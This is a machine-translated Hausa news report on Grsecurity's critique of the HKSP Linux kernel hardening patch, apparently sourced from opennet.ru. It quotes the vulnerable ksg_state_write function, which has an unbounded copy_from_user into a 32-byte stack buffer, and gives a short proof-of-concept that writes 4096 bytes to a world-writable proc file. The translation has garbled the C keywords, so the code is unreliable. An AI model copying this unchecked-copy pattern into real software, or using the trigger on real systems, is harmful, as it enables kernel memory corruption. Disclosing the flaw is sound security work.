Masu haɓaka aikin Gsecurity hankali ga kasancewar rashin lahani mara amfani a cikin saitin facin (Kariyar Kai ta Huawei Kernel), kwanaki kaɗan da suka gabata don inganta tsaro na Linux kernel. Halin yana tunatarwa , wanda yunƙurin inganta tsaro na tsarin ya haifar da fitowar wani sabon rauni kuma ya sauƙaƙe don daidaita na'urori.
Wani ma'aikacin Huawei ne ya buga facin HKSP, ya haɗa da ambaton Huawei a cikin bayanin martabar GitHub, kuma a yi amfani da kalmar Huawei a cikin sunan aikin (HKSP - Huawei Kernel Self Protection). A lokaci guda, wakilan Huawei sun musanta haɗin gwiwar aikin HKSP tare da kamfanin kuma sun bayyana cewa an ƙera lambar a kan shirin ma'aikaci na sirri, ba aikin Huawei ba ne na hukuma kuma ba a amfani da shi a cikin kayayyakin kamfanin. Kunna HKSP na baya raunin kuma lura cewa ana haɓaka aikin a cikin lokacin hutu don dalilai na bincike.
HKSP ya haɗa da canje-canje irin su bazuwar ɓangarori a cikin tsarin ƙididdigewa, kariya daga hare-hare kan mai gano sunan mai amfani (pid namespace), rabuwar tsarin tsari daga yankin mmap, gano kira sau biyu zuwa aikin kfree, toshe leaks ta hanyar pseudo. -FS /proc (/proc/ {modules, maɓallai, masu amfani da maɓalli}, /proc/sys/kernel/* da /proc/sys/vm/mmap_min_addr, /proc/kallsyms), inganta ingantaccen adireshin sararin samaniya, ƙarin Ptrace kariya, inganta smap da smep kariya , ikon hana aika bayanai ta hanyar raw sockets, toshe adiresoshin da ba daidai ba a cikin kwasfa na UDP da kuma duba amincin tafiyar matakai. Hakanan ya haɗa da tsarin Ksguard kernel, wanda ke nufin gano yunƙurin gabatar da tushen tushen tushen.
Атчи Greg Kroah-Hartman, wanda ke da alhakin kiyaye tsayayyen reshe na kernel na Linux, yana da sha'awa, kuma ya nemi marubucin ya karya facin monolithic zuwa sassa don sauƙaƙe bita da haɓakawa zuwa babban kwaya. Kees Cook, kai a kan Fasahar kariya mai aiki a cikin Linux kernel, kuma amsa faci kuma, daga cikin matsalolin, ya jawo hankali ga ɗaure ga gine-ginen x86 da yanayin sanarwa na yawancin halaye, wanda kawai shigar da bayanai game da matsalar, amma kada kuyi ƙoƙarin toshe shi.
Wani bincike na facin da masu haɓakawa na Grsecurity ya nuna kurakurai da rauni da yawa a cikin lambar, sannan kuma ya nuna rashin tsarin barazanar da zai basu damar yin hukunci daidai da iyawar aikin. Don nuna a fili cewa an rubuta lambar ba tare da amfani da amintattun hanyoyin tsara shirye-shirye ba, an ba da misali na rashin lahani mara nauyi a cikin mai sarrafa.
fayil /proc/ksguard/state, wanda aka ƙirƙira tare da haƙƙin 0777, yana nuna cewa kowa yana da damar rubutawa. Aikin ksg_state_write, wanda ake amfani da shi don tantance umarnin da aka rubuta zuwa /proc/ksguard/state, yana ƙirƙirar tmp[32] wanda aka rubuta bayanai dangane da girman operand ɗin da aka wuce, ba tare da la'akari da girman maƙasudin buffer ba kuma ba tare da duba siga tare da girman kirtani. Wadancan. Don sake rubuta wani ɓangare na tarin kwaya, maharin kawai yana buƙatar rubuta layi na musamman da aka tsara zuwa /proc/ksguard/state.
static ssize_t ksg_state_write (fayil ɗin tsari * fayil, const char __user * buf,
size_t ruwan tabarau, loff_t * biya diyya)
{
u64 darajar;
char tmp[32];
girman_t n = 0;
idan (copy_from_user (tmp, buf, len))
dawo - 1;
darajar = simple_strtoul (tmp, '\0', 10);
...
Yi amfani da samfur:
char buf[4096] = {};
int fd = bude ("/proc/ksguard/state", O_WRONLY);
idan (fd>= 0) {
rubuta (fd, buf, sizeof (buf));
kusa (fd);
}
source: budenet.ru